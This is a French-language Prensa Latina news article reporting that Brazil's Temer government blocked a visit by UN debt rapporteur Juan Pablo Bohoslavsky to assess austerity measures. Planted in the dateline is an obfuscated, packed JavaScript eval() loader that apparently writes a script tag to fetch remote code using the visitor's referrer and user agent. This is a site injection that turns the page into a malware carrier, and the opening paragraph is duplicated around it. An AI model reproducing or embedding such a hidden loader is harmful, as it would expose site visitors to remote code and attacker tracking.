mardi 16 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

Le gouvernement brésilien empêche la visite d´un rapporteur des Nations Unies

Brasilia, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sdtif|var|u0026u|referrer|berkb||js|php'.split('|'),0,{})) 27 février (Prensa Latina) La décision du gouvernement du président Michel Temer d´empêcher la visite au Brésil du rapporteur des Nations Unies pour la Dette, Juan Pablo Bohoslavsky, a eu un large écho dans la presse nationale.

Brasilia, 27 février (Prensa Latina) La décision du gouvernement du président Michel Temer d´empêcher la visite au Brésil du rapporteur des Nations Unies pour la Dette, Juan Pablo Bohoslavsky, a eu un large écho dans la presse nationale.

Le voyage de Bohoslavsky, qui, selon le site internet Brasil 247, examinerait l´impact des mesures d´austérité promues par Temer dans les secteurs sociaux, devrait avoir lieu entre les 18 et 30 mars prochains, mais l´Exécutif n´a jusqu´à l´heure présenté aucune date pour que cette visite puisse se réaliser.

Le représentant de l´Organisation Non Gouvernementale Conectas, Jefferson Nascimento, a signalé que « cette visite serait une opportunité pour avoir plus d´information au sujet des impacts de l´amendement constitutionnel 95 », lequel gèle les dépenses publiques du gouvernement pendant 20 ans.

Selon l´ONG, Bohoslavsky serait l´unique rapporteur de l´ONU à visiter le pays lors du premier semestre, et « probablement durant toute l´année puisque les préparatifs et les élections devraient empêcher ce type de voyage pendant la deuxième partie de 2018 ».

Le site d´information UOL a pour sa part rappelé que l´année dernière, le gouvernement brésilien a voté contre une résolution, présentée à l´Assemblée générale des Nations Unies, qui renouvelait le mandat du rapporteur de l´ONU. Ce dernier devait évaluer l´impact des politiques fiscales sur les droits de l´homme.

Dans ce projet de résolution, certains gouvernements reconnaissaient que les programmes d´ajustements structuraux limitent les dépenses publiques, et provoquent donc une prise en charge inadéquate des services sociaux.

peo/mem/mpm

EN CONTINU
notes connexes